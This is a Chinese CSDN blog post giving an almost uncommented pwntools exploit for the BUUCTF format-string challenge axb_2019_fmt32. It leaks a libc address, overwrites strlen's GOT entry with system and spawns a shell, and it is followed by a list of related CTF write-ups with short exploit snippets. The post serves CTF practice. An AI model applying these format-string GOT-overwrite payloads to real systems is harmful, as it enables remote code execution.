[BUUCTF-pwn]——axb_2019_fmt32

最新推荐文章于 2024-07-17 17:20:20 发布
最新推荐文章于 2024-07-17 17:20:20 发布
阅读量472 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114990388
版权

[BUUCTF-pwn]——axb_2019_fmt32

啊啊啊啊啊啊啊,为什么明明很简单的一道题写了好久

from pwn import * 
from LibcSearcher import LibcSearcher

p = remote("node3.buuoj.cn",26515)
elf = ELF("./axb_2019_fmt32")

puts_got = elf.got["puts"]

strlen_got = elf.got["strlen"]

payload1 = "%9$s" + "a" + p32(puts_got)
p.sendafter("Please tell me:",payload1)
p.recvuntil(":")
puts_addr = u32(p.recv(4))
print(hex(puts_addr))

libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump("puts")
system_addr = libcbase + libc.dump("system")
bin_sh = libcbase + libc.dump("str_bin_sh")
log.success("system_addr ---> ", hex(system_addr))
info("bin_sh ---> ", hex(bin_sh))

high_sys = (system_addr >> 16) & 0xffff
low_sys = system_addr & 0xffff

payload2 = "a" + "%" + str(low_sys - 10) + "c%16$hn" + "%" + str(high_sys - low_sys) + "c%17$hn"
payload2 +=  "a" * 6 
payload2 += p32(strlen_got) + p32(strlen_got + 2)

p.sendafter("Please tell me:",payload2) 

payload3 = ';/bin/sh\x00'
p.sendafter("Please tell me:",payload3)

p.interactive()
Y-peak
关注
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1580
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
BUUCTF axb_2019_fmt32(格式化字符串漏洞)
weixin_45441024的博客
01-07 1275
BUUCTF axb_2019_fmt32(格式化字符串漏洞) 我们还是先check一下,发现RELRO是关闭的,那么好,可以修改GOT表了 显而易见这是一个格式化字符串漏洞 ,接下来我们来测试一下偏移量 这里可以看到我们输入了5个a它的ASCII码是61,但是往后进行查看只有四个61,所以我们在之后的构造中就再补上一个字符就对齐了,我们算一下它的偏移量是8,所以只要输入%7$p就可以了。我们就可以利用这个和格式化字符串来泄露出一个函数的地址,来获取libc版本,就能获得system函数的地址了。
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1726
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
axb_2019_fmt32
、moddemod
07-19 852
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './axb_2019_fmt32' # p = process(proc_name) p = remote('node3.buuoj.cn', 27478) elf = ELF(proc_name) read_got = elf.got['read'..
BUUCTFaxb_2019_fmt32
weixin_51055545的博客
04-25 2208
例行检查 是开 了部分relro,可以改写got表,然后栈不可执行不, IDA分析 很简单的一个程序,会先初始化一些后续要用到的栈空间,然后让我们输入,字节数大小会有限制,然后再对我们的输入做一个长度判断,长度符合的话就会调用printf()函数,存在格式化字符串漏洞,程序里没有system,binsh字符串,我们这里就要先leak出地址,然后返回system即可,观察程序不难发现,我们无法溢出去控制返回地址,然而我们可以去改 某一函数的got表地址为system,从而去get shell,通过分析,s
axb_2019_fmt32(fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’))
weixin_61283545的博客
06-15 211
fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’) 第一个参数表示格式化字符串的偏移 第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress}; 第三个参数表示已经输出的字符个数 第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 937
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
axb_2019_fmt32 wp
xia0ji233
06-08 481
title: axb_2019_fmt32 wp date: 2021-6-8 22:00:00 tags: write up format string comments: true categories: ctf pwn 临近期末考试了,终于可以光明正大地水博客了。 最近刚写上格式化字符串的漏洞,这不,他来了。这个题目我做过之后感觉难度还是有的,做出这一题至少对格式化字符串漏洞的利用是有一个较深的理解了的。它综合考察了ret2libc和格式化字符串的任意写,以及对got表的理解。 axb_20.
BUUCTFpwn】解题记录(1-3页已完结)
Assassin
05-05 1997
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
BUUCTF axb_2019_fmt32 & fmt64
最新发布
zwb2603096342的博客
07-17 1334
格式化字符串漏洞,fmt32和fmt64位
BUU第二页wp(除堆题)
2301_79525044的博客
03-15 310
可以看到,选择1后,会直接将我们的输入作为system的参数,所以直接传入cat flag即可,要注意使用||或&分割,不然会传入其他数据,导致命令无法执行。vuln函数中存在栈溢出,接下来就是ret2libc了。32位,开了canary,下载这个附件居然有病毒,离谱。gift中存在格式化字符串漏洞,可泄露canary。存在后门函数,直接栈溢出返回到后门函数即可。64位开启了NX保护和canary保护。存在栈溢出,典型的ret2libc。64位RELRO全开,开启了pie。直接写入shellcode即可。
buuctf gyctf_2020_borrowstack(栈迁移)和r2t4,axb_2019_fmt32(格式化字符串和fmtstr_payload工具的使用)
carol2358的博客
05-24 1379
头痛,之前栈学的漏洞好多,只学了相关知识没有做题,真正碰到题目就不会了,真的头痛 gyctf_2020_borrowstack 栈迁移 payload设置 此种攻击方法的关键在于如何同时控制ebp和eip,那么如何同时控制ebp和eip的值的? 1、使用ROPgadget查找leave;ret指令所在的地址 2、覆盖完成bufer后,使用可控制的地址覆盖ebp的值,使用上述leave;ret指令所在地址覆盖ret的值。 程序运行(32位,64位同理): 1、当函数正常返回时,执行leave;re
BUU刷题(三)
playmaker的博客
03-13 1023
BUU刷题(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到题目直...
axb_2019_heap
doudoudedi
02-05 958
思路 格式化字符串泄露程序基址和libc基址然后unlink一个指针到bss段将free_hook写入system释放即可拿到shell exp: from pwn import * #p=process('./axb_2019_heap') p=remote('node3.buuoj.cn',29873) elf=ELF('./axb_2019_heap') libc=elf.libc #gdb...
[BUUCTF]PWN——inndy_echo(32位fmt修改got表)
mcmuyanga的博客
02-01 940
inndy_echo 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下,看看大概的情况,已经看到存在格式化字符串漏洞了,而且还是可以一直输入的哪种 32位ida载入 看到程序里存在格式化字符串漏洞,而且有system函数,想到的是将printf@got修改为system@plt,由于一开始system没用执行,所以got表里的地址不对,得用plt表里的。然后传入bin/sh即可 pwntools集成了一个很强的工具,我们可以通过它快速修改对应的值, 命令格式: fmts
ciscn_2019_pwn挑战赛:破解五道经典题目解析
资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目,分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力,以及对操作系统底层安全的深刻理解。接...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值